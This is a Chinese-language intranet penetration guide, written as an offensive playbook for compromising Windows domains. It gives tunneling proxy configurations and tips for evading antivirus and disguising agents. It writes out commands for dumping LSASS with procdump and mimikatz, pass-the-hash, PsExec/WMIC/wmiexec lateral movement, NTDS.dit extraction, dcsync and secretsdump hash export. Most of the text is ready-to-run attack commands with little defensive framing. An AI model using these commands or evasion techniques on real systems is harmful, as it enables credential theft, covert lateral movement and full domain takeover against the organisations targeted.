内网渗透实战指南：从入门到精通

背景介绍

内网渗透是网络安全领域的重要技能，本文详细记录了从零开始的内网渗透实战过程，重点介绍常用工具、方法和高效思路。

代理工具详解

NPS（内网穿透工具）

特性：

• 支持几乎所有协议
• 提供内网HTTP/SOCKS5代理、P2P等功能
• 简洁强大的WEB管理界面
• 支持服务端和客户端同时控制
• 全平台兼容，可一键注册为服务

配置要点：

# HTTP代理配置
http_proxy_ip=
http_proxy_port=
https_proxy_port=
https_just_proxy=

# Bridge配置
bridge_type=tcp
bridge_port=8888
bridge_ip=0.0.0.0

# 日志配置
log_level=7
log_path=/dev/null

# 客户端认证
public_vkey=iamavkey

# Web管理端配置
web_host=test.com
web_username=user
web_password=pass
web_port=12345
web_ip=0.0.0.0
web_base_url=/only_login

使用技巧：

1. 端口复用：将bridge_port、http_proxy_port、https_proxy_port、web_port设为同一端口
2. 心跳检测：默认5秒间隔，60次丢包断开（5分钟）
3. Linux伪装：将npc重命名为php并设置环境变量

FRP

功能与NPS类似，主要特点：

• 高性能反向代理
• 支持TCP/UDP/HTTP/HTTPS等多种协议
• 配置文档详尽

EarthWorm（EW）

核心功能：

• SOCKS v5服务架设
• 端口转发

特殊场景应用：
当目标机器不出网时，可在跳板机开启正向SOCKS5监听端口

免杀技巧：

1. 重新编译
2. 去除不必要的字符常量
3. 修改流量特征

Invoke-Proxy

Windows正向SOCKS5连接：

Import-Module .\Invoke-SocksProxy.psm1;Invoke-SocksProxy -bindPort 1080

域信息收集全流程

前期信息收集

基础命令：

:: 获取域名称
net config Workstation
net time /domain
systeminfo
ipconfig /all

:: 域内信息收集
net group "domain admins" /domain
net group "enterprise admins" /domain 
net group "domain controllers" /domain
net user /domain > user.txt
net group "domain computers" /domain > com.txt
net group /domain > group.txt
nltest /domain_trusts
setspn -T target.com -Q */* > spn.txt

:: DNS查询
nslookup -type=all _ldap._tcp.dc._msdcs.test.com
nslookup google.com

本地Hash抓取方法：

1. 上传procdump64.exe
2. 运行：procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
3. 下载dump文件
4. 本地使用mimikatz分析：

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

横向扩展执行命令方法

PsExec

原理：
通过admin\(和ipc\)共享上传psexesvc.exe，创建命名管道进行交互

用法：

PsExec.exe \\目标IP -u domain\user -p password -s cmd

痕迹：

• 安装PSEXESVC服务
• 生成Event 4697、7045、4672日志

WMIC

特点：

• 无回显
• 需结合文件操作查看结果

用法：

wmic /node:IP /user:user /password:pass process call create "cmd.exe /c ipconfig>result.txt"

WMIExec

优势：

• 无exe落地
• 不启动服务

用法：

python3 wmiexec.py domain/user@IP -hashes LMHASH:NTHASH

Pass The Hash (PTH)攻击

应用场景：

1. PsExec：

privilege::debug
sekurlsa::pth /user:user /domain:test /ntlm:hash
PsExec.exe /accepteula \\IP cmd.exe

2. RDP：

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:"mstsc.exe /restrictedadmin"

需先启用策略：

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

3. Web应用（NTLM认证）：

sekurlsa::pth /user:user /ntlm:hash /domain:domain /run:cmd.exe

然后使用IE访问目标网站

中期信息收集（域控）

NTDS.dit导出

1. 创建快照：

ntdsutil snapshot "activate instance ntds" create quit quit

2. 挂载快照：

ntdsutil snapshot "mount {GUID}" quit quit

3. 复制文件：

copy C:\$SNAP_...\windows\NTDS\ntds.dit c:\ntds.dit

4. 卸载删除快照：

ntdsutil snapshot "unmount {GUID}" quit quit
ntdsutil snapshot "delete {GUID}" quit quit

5. 导出SYSTEM：

reg save HKLM\SYSTEM sys.hiv

域Hash导出方法

1. 使用secretsdump.py：

python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL --outputfile hash.txt

2. 使用mimikatz：

lsadump::dcsync /domain:domain /all /csv

3. 远程导出：

python secretsdump.py domain/user@IP -just-dc -hashes LMHASH:NTHASH

DNS记录导出

Dnscmd DC.domain /EnumZones
Dnscmd . /ZonePrint domain.com
Dnscmd . /EnumRecords domain.com .

PowerShell脚本：

$Zones = @(Get-DnsServerZone)
ForEach ($Zone in $Zones) {
    Write-Host "`n$($Zone.ZoneName)" -ForegroundColor "Green"
    $Zone | Get-DnsServerResourceRecord |fl
}

域认证记录导出

wevtutil qe security /q:"Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]" /f:text /rd:true > Evtlogon.txt

后期信息收集

重点转向：

• 组织结构分析
• 特定部门IP段定位
• 文档信息挖掘

总结

内网渗透的难易程度取决于：

1. 网络规模
2. 运维专业程度
3. 安全防护措施（防火墙、流量审计等）

关键成功因素：

• 选择合适的工具
• 了解各种技术的优缺点
• 根据环境调整策略
• 持续学习和适应新环境